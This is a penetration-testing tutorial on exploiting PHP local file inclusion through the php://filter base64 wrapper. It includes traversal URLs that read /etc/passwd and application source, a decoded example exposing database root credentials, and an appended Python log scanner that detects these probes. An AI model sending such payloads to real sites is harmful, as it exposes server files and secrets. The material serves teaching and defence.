Exploiting the hidden LFI

Many times during a web application penetration test we get to test for various security threats and bugs. This short article narrates one such experience from a penetration test, where we noticed that many security professionals do not fully understand the situation and leave the work half done. Local file inclusion (LFI) is a web exploitation technique in which files on the server are included in a page through the web browser. The vulnerability mainly occurs when a page include is not properly sanitized and allows directory traversal characters to be injected.

Sometimes we need a look at the PHP source of the LFI-vulnerable website: it may reveal more secrets to the attacker and help with proper exploitation when both log access and /proc/self/environ fail. The technique uses the php://filter stream wrapper: its convert.base64-encode filter returns the included PHP file base64-encoded instead of letting the server execute it. We then decode the base64 string to read the code. Take for example an LFI like this:

http://www.victim.com/index.php?lfi=../../../../etc/passwd%00

All you have to do is to change it to:

http://www.victim.com/index.php?lfi=php://filter/read=convert.base64-encode/resource=index.php%00

Let me make it easier to understand. Suppose www.victim.com is vulnerable to LFI. Requesting the following URL:

http://www.victim.com/index.php?lfi=php://filter/read=convert.base64-encode/resource=connectdb.php%00

will reveal this:

PD9waHANCglteXNxbF9jb25uZWN0ICgibG9jYWxob3N0Iiwicm9vdCIsImRiYTEzMzciKTsNCglteXNxbF9zZWxlY3RfZGIoImNvbmZpZGVudGlhbCIpOw0KPz4=

And after base64-decoding it, we get the following:

<?php
	mysql_connect ("localhost","root","dba1337");
	mysql_select_db("confidential");
?>

This might look quite small, but we have noticed that it had been left untouched during many tests. We hope this was informative. Stay tuned! :)
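For the defending side, here is an added example (not part of the original post) that scans web-server access logs for the request patterns discussed above: the php://filter wrapper with convert.base64-encode, directory traversal, and the trailing null byte. The log lines are constructed, and the parameter name lfi follows the article's URLs.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines (not captured from any real server). The
# "lfi" parameter name follows the URLs used in the article above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?lfi=home HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?lfi=../../../../etc/passwd%00 HTTP/1.1" 200 1873
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?lfi=php://filter/read=convert.base64-encode/resource=connectdb.php%00 HTTP/1.1" 200 140
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?lfi=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Indicators of LFI probing, checked against the fully URL-decoded value:
# PHP stream wrappers, the base64 filter from the article, directory
# traversal, and the null byte used to cut off an extension appended by the app.
INDICATORS = {
    "php_wrapper": re.compile(r"^(php|data|expect|phar)://", re.I),
    "base64_filter": re.compile(r"convert\.base64-(en|de)code", re.I),
    "traversal": re.compile(r"(^|/)\.\.(/|$)"),
    "null_byte": re.compile(r"\x00"),
}

def classify_value(value: str) -> list:
    """Return the names of the indicators matched by one query-parameter value."""
    decoded = unquote(unquote(value))  # extra rounds catch double-encoded payloads
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def scan_log(text: str) -> list:
    """Return one finding per log line whose query string carries LFI indicators."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query  # parse_qsl decodes %xx once itself
        for param, value in parse_qsl(query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append({"param": param, "indicators": hits, "line": line})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["param"], finding["indicators"])
```

Because the filter wrapper returns source rather than executing it, a 200 response with a small body on such a request is a strong sign that the include path reached the attacker as-is.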